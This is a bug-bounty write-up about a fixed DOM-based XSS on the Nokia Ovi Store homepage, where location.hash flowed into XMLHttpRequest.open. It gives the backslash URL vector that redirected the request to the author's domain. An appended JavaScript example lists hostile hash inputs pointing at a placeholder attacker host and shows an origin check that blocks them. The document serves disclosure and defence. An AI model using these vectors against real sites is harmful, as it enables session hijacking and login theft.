DOM Based XSS found at Nokia OVI Store Homepage


Vulnerability Type: Cross Site Scripting
Vulnerable Domain: http://store.ovi.com/
Status: Fixed

Detailed Writeup: Last year I reported a critical DOM Based Cross Site Scripting vulnerability on the homepage of the Nokia Ovi Store, http://store.ovi.com/. The website uses the CORS (Cross Origin Resource Sharing) mechanism to load content into a particular area (div) of the page via XMLHttpRequests. So let's look at one of the URLs: http://store.ovi.com/#/applications?categoryId=14 The location of the content to be loaded into that div is given in the URL, i.e. in location.hash.

I use DOMinator often; it's a very useful tool. So I fuzzed the URL with DOMinator and got something like this: 1 alert whose source is location.hash and whose sink is XMLHR.open (XMLHttpRequest.open). Pretty nice :) I opened the URL in Google Chrome, and in the Console tab I got this:

I tried putting some junk text in just to see what was going on. For example, http://store.ovi.com/#/jasminder results in the following.

Since the sink was XMLHR.open, I tried putting my website after the hash, but the HTTP request was still being made to http://store.ovi.com/jasminderapalsingh.info?fragment=1, which obviously won't work. I wanted the site to send the XHR to jasminderpalsingh.info only. After doing some research I learned about absolute URLs, and then I figured out a classic vector that works with Chrome: http://store.ovi.com/#/\jasminderapalsingh.info Perfect, I made it :) Now there was a dedicated XHR sent to my domain. After bypassing the Same Origin Policy I could get JavaScript executed on the site:

This DOM Based XSS affected the whole site. Below is the video PoC of how I exploited this vulnerability to steal any user's login details. Enjoy it :)
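To make the sink concrete, here is an added example (not the Ovi Store's own code) that models what the post describes: the text after "#" is handed to XMLHttpRequest.open() as a relative URL, which the browser resolves against the page. It shows why the backslash vector escapes the origin and how an origin check after URL resolution blocks it. The attacker hostname is a placeholder, the code shape of the original sink is assumed, and the only requirement is a WHATWG URL parser (the global `URL` in Node 10+ and in browsers).

```javascript
// Added example, not code from the original post or from the Ovi Store.
// Models the location.hash -> XMLHttpRequest.open sink and its fix.

const PAGE_URL = 'http://store.ovi.com/'; // origin taken from the post

// What the browser would fetch for a given location.hash value.
// new URL(relative, base) applies the same resolution rules XHR does,
// including treating "\" like "/" for http(s) URLs, which is exactly why
// "#/\host" turns into "http://host/" instead of a path on store.ovi.com.
function resolveFragmentTarget(hash) {
  const fragment = hash.replace(/^#/, '');
  return new URL(fragment, PAGE_URL);
}

// Vulnerable shape (assumed): the hash is trusted completely, so the
// resolved request can leave the page's origin.
function fragmentTargetVulnerable(hash) {
  return resolveFragmentTarget(hash).href;
}

// Hardened shape: resolve first, then compare the resulting origin with the
// page's origin. Checking the parsed origin (rather than blacklisting
// characters) catches "//host", "/\host", "\\host" and absolute URLs alike.
function fragmentTargetSafe(hash) {
  const target = resolveFragmentTarget(hash);
  if (target.origin !== new URL(PAGE_URL).origin) {
    return null; // refuse to issue the XHR; fall back to a default view
  }
  return target.href;
}

// Constructed inputs mirroring the URLs in the post (attacker host is a
// placeholder, not a real target).
const SAMPLES = [
  '#/applications?categoryId=14', // legitimate deep link
  '#/jasminder',                  // junk path, still same-origin
  '#/\\attacker.example',         // backslash vector from the post
  '#//attacker.example',          // protocol-relative variant
];

for (const hash of SAMPLES) {
  console.log(hash, '->', fragmentTargetVulnerable(hash),
              '| safe:', fragmentTargetSafe(hash));
}
```

Running it prints the cross-origin resolution for the two attacker samples in the vulnerable column and `null` in the safe column, while the two legitimate hashes pass through unchanged.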
I got a Nokia Lumia 820 as a reward for this vulnerability.
Thanks to the following people: https://twitter.com/kkotowicz
https://twitter.com/WisecWisec
https://twitter.com/netfuzzer
